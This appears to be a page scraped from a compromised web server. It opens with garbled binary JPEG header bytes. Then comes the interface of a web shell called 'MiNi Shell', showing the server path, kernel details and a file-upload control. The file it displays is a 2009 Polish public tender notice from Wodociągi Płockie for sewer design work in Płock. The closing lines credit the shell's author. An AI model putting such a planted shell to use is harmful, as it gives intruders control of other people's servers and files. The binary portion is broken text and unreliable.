JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090216/29636-N-2009.html

<p class="kh_header"><b>Płock: Opracowanie dokumentacji projektowej dla zadania:  Budowa kanalizacji sanitarnej na terenie osiedli Góry-Ciechomice realizowanego w ramach projektu Funduszu Spójności pn.: Uporządkowanie gospodarki ściekowej na terenie miasta Płocka.</b><br>
<b>Numer ogłoszenia: 29636 - 2009; data zamieszczenia: 16.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Płockie Sp. z o.o. , ul.  A. Gradowskiego 11, 09-402 Płock, woj. mazowieckie, tel. 024 3644200, faks 024 3644202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodociagi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dla zadania:  Budowa kanalizacji sanitarnej na terenie osiedli Góry-Ciechomice realizowanego w ramach projektu Funduszu Spójności pn.: Uporządkowanie gospodarki ściekowej na terenie miasta Płocka..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot niniejszego zamówienia stanowi usługa polegająca na:

a)	opracowaniu dokumentacji projektowych wraz z uzyskaniem pozwolenia na budowę  dla zadania: Budowa kanalizacji sanitarnej na terenie osiedli Góry-Ciechomice, w skład którego wchodzi:
- Budowa kanalizacji sanitarnej grawitacyjnej, lokalnych układów pompowo-tłocznych na terenie osiedli Góry-Ciechomice.
Projekty należy opracować dla wszystkich branż niezbędnych dla zrealizowania zadania, wraz z projektami odtworzenia nawierzchni pasa drogowego.
Zamówienie obejmuje wykonanie dokumentacji projektowych w następującym zakresie:
1)  wykonania map do celów projektowych;
2) wykonania badań i opracowań przedprojektowych w tym badań geotechnicznych;
3) wykonanie projektu organizacji robót wraz z projektem organizacji ruchu;
4)wykonania dokumentacji projektowych:
a)	Wykonanie projektu budowlanego w zakresie uwzględniającym specyfikę robót budowlanych, 
b)	Wykonanie projektów wykonawczych w zakresie i stopniu dokładności niezbędnym do sporządzenia specyfikacji technicznych wykonania i odbioru  robót oraz w zakresie niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez Wykonawcę i realizacji robót budowlanych,
c)	Wykonanie przedmiaru  robót,
d)	Opracowanie informacji dot. bezpieczeństwa i ochrony zdrowia, 
e)	Wykonanie projektów odtworzenia nawierzchni pasa drogowego,
f)	Wykonanie projektów na odwodnienie wykopów liniowych pod kanalizację,
g)	Wykonanie operatów wodno-prawnych na odwodnienie wykopów liniowych dla odcinków sieci wymagających takiego opracowania, zaprojektowanie odpowiednich zabezpieczeń obiektów znajdujących się w bezpośrednim sąsiedztwie projektowanych kanałów, 
h)	Wykonanie obliczeń hydraulicznych i wytrzymałościowych dla projektowanych kanałów,  (m. in. określenie zlewni, bilans ścieków narastająco dla odcinków z uwzględnieniem całej zlewni)
5)wykonania specyfikacji technicznych wykonania i odbioru robót budowlanych.
6)wykonania opracowań kosztowych.
7) wykonania czynności i dokumentacji dla uzyskania prawa do dysponowania nieruchomościami na cele budowlane oraz prawa przejazdu i przechodu do mediów jakie zostaną wybudowane na tych nieruchomościach.
8)wykonania pozostałej niezbędnej dokumentacji.
b)	Opracowaniu Specyfikacji Istotnych Warunków Zamówienia (w tym Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych) na wyłonienie wykonawcy robót dla zadania:
- Budowa kanalizacji sanitarnej na terenie osiedli Góry-Ciechomice 
SIWZ winna zostać opracowana zgodnie z przepisami ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jedn.: Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) oraz towarzyszącymi aktami wykonawczymi, a także w oparciu o wymogi Warunków kontraktowych dla budowy dla robót inżynieryjno-budowlanych projektowanych przez Zamawiającego, pierwsze wydanie w języku angielskim 1999, przygotowane i opublikowane przez Międzynarodową Federację Inżynierów konsultantów (Fédération Internationale des Ingénieurs-Conseils - FIDIC), P.O. Box 86, CH-1000 Lausanne 12, Szwajcaria, oraz drugie wydanie angielsko-polskie 2004
   c) wsparciu Zamawiającego na etapie postępowania (przygotowanie odpowiedzi na pytania wykonawców);
   d) wsparciu Zamawiającego podczas ewentualnej procedury odwoławczej w postępowaniu na wybór wykonawcy robót.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.60.00.00-4, 79.41.52.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 20 000 PLN (słownie: dwadzieścia tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków:
O udzielenie zamówienia mogą się ubiegać Wykonawcy którzy:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlegają wykluczeniu z postępowania o udzielenie niniejszego zamówienia na podstawie przesłanek zawartych § 7 ust. 6-7 Regulaminu Wewnętrznego;
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym, i osobami zdolnymi do wykonania zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
a)	wykonać w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie:
- co najmniej dwa projekty budowlane oraz wykonawcze (lub budowlano-wykonawcze) z zakresu budowy kanalizacji sanitarnej na obszarach miejskich w miejscowości pow. 50 000 mieszkańców i długości co najmniej 8 km. każdy. Za zamówienia wykonane z zakresu projektowania Zamawiający uznaje takie, dla którego wydano prawomocne pozwolenie na budowę;
- co najmniej dwie dokumentacje przetargowe (kompletne SIWZ na roboty) dla zadań z zakresu gospodarki wodno- ściekowej zgodnie z przepisami ustawy z dnia 29 stycznia 2004r. Prawo zamówień (tekst jedn.: Dz. U. z 2007 r. Nr 223, poz. 1655) oraz towarzyszącymi aktami wykonawczymi o szacowanej wartości robót każdej z nich min. 1 mln. EURO. 
- co najmniej dwa opracowania numerycznych map do celów projektowych w skali 1:1000 lub 1:500 (sytuacyjno - wysokościowe z nakładką ewidencyjną) o łącznej powierzchni skartowanego terenu minimum 150 ha, w tym jedno o łącznej powierzchni min. 70 ha
b)	posiadać w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie przeciętne zatrudnienie w wysokości co najmniej 10 osób i co najmniej 2 osób personelu kierowniczego.
c)	Wykonawca wskaże do wykonania niniejszego zamówienia następujące osoby wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności:
Kierownik Zespołu (Ekspert 1), posiadający:
- minimum 5-letnie doświadczenie w kierowaniu lub zarządzaniu projektami z zakresu budowy infrastruktury w sektorze gospodarki wodno-ściekowej, na stanowisku Kierownik Projektu lub równoważnym,
- znajomość języka polskiego w mowie i piśmie. 
Inżynier budowlany - projektant (Ekspert 2), posiadający:
- uprawnienia do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej;
- minimum 10-letnie doświadczenie zawodowe, w tym co najmniej 4 lata jako projektant robót konstrukcyjno - budowlanych;
- aktualny wpis do właściwej izby samorządu zawodowego;
Inżynier sanitarny - projektant (Ekspert 3), posiadający:
- uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych 
- minimum 10-letnie doświadczenie zawodowe, w tym co najmniej 4 lata jako projektant sieci sanitarnych;
- aktualny wpis do właściwej izby samorządu zawodowego;
Inżynier drogowy - projektant (Ekspert 4), posiadający:
- uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej;
- minimum 10-letnie doświadczenie zawodowe, w tym co najmniej 4 lata jako projektant robót drogowych;
- aktualny wpis do właściwej izby samorządu zawodowego;

UWAGA: Wszyscy eksperci kluczowi wymagani w ofercie winni posługiwać się językiem polskim lub dysponować na stałe tłumaczem języka polskiego

3. Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku.): 
a)	Wykonawca osiągnął w każdym z ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, roczne przychody netto ze sprzedaży w wysokości, co najmniej 1 000 000 PLN.
b)	posiadać środki finansowe lub posiada zdolność kredytową w wysokości, co najmniej 500 000 PLN. 
c)	posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 1 000 000 PLN. W przypadku wykonawców składających ofertę wspólną wystarczające jest złożenie polisy na wymaganą kwotę przez jednego z wykonawców. 
W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż określono w pkt III.2)3. Zamawiający jako kurs przeliczeniowy waluty, w której oszacowano warunki finansowo-ekonomiczne przyjmie średni kurs Narodowego Banku Polskiego (NBP) opublikowany w dniu ukazania się ogłoszenia o zamówieniu na niniejsze usługi w Dzienniku Urzędowym Unii Europejskiej.

Średnie kursy walut dostępne są pod następującym adresem: 
http://www.nbp.pl/home.aspx?f=/Kursy/kursy.htm
Ocena spełnienia przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia
4. Wykonawcy składający ofertę wspólną mogą spełniać postawione w ust. 2 i 3 warunki łącznie.
5. W przypadku oferty składanej przez wykonawców wspólnie, do oferty musi być dołączony dokument ustanawiający pełnomocnika do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia, z określeniem zakresu pełnomocnictwa

   Wszelkie pełnomocnictwa winny być złożone w formie oryginałów lub kopii poświadczonych notarialnie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Na potwierdzenie  warunków udziału w postępowaniu wykonawca zobowiązany jest złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu, zawarte w treści Załącznika nr 2, oraz:
1.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty każdego z nich);
2.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
3.	aktualną informacji z Krajowego Rejestru Karnego  w zakresie określonym w § 7 ust.6 pkt. 4-6 Regulaminu, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert;
4.	wykaz wykonanych usług sporządzony według wzoru wykazu wykonanych przez Wykonawcę usług stanowiącego Załącznik nr 5 do SIWZ oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie; 
5.	informację na temat przeciętnej liczby zatrudnionych pracowników oraz  liczebności personelu kierowniczego sporządzoną według wzoru stanowiącego Załącznik nr 3 do SIWZ;
6.	wykaz osób, które będą wykonywać  zamówienie wraz informacjami nt. ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynność sporządzony według wzoru stanowiącego załącznik nr 4 do SIWZ (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców powinni oni przedłożyć wykaz na jednym załączniku) wraz z dokumentami potwierdzającymi, że osoby - Eksperci 2, 3, 4 wskazani do realizacji niniejszego zamówienia posiadają:

- odpowiednie uprawnienia budowlane w poszczególnych branżach;
- aktualny wpis do właściwej izby samorządu zawodowego.

Powyższe uprawnienia muszą być zgodne z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. 2006 nr 83 poz. 578 z poźń. zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Osoby, które posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity: Dz.U.2006 nr 156 poz. 1118 ze zm.) oraz Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U.06 nr 83 poz. 578, ze zm. Dz.U.07 nr 210 poz. 1528), uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia bez ograniczenia samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie;

7.	rachunek zysku i strat, a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, inne dokumenty określające przychody netto ze sprzedaży - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, potwierdzające roczne przychody netto ze sprzedaży w wymaganej wysokości;
8.	informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym posiadają rachunek, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzającą posiadanie środków finansowych lub posiadanie zdolności kredytowej w wymaganej wysokości;
9.	polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na wymaganą kwotę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wodociagi.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wodociągi Płockie Sp. z o.o.. ul. Harc. A. Gradowskiego 11, 09-402 Płock, p.203.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2009 godzina 09:00, miejsce: Wodociągi Płockie Sp. z o.o.. ul. Harc. A. Gradowskiego 11, 09-402 Płock, p.101.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com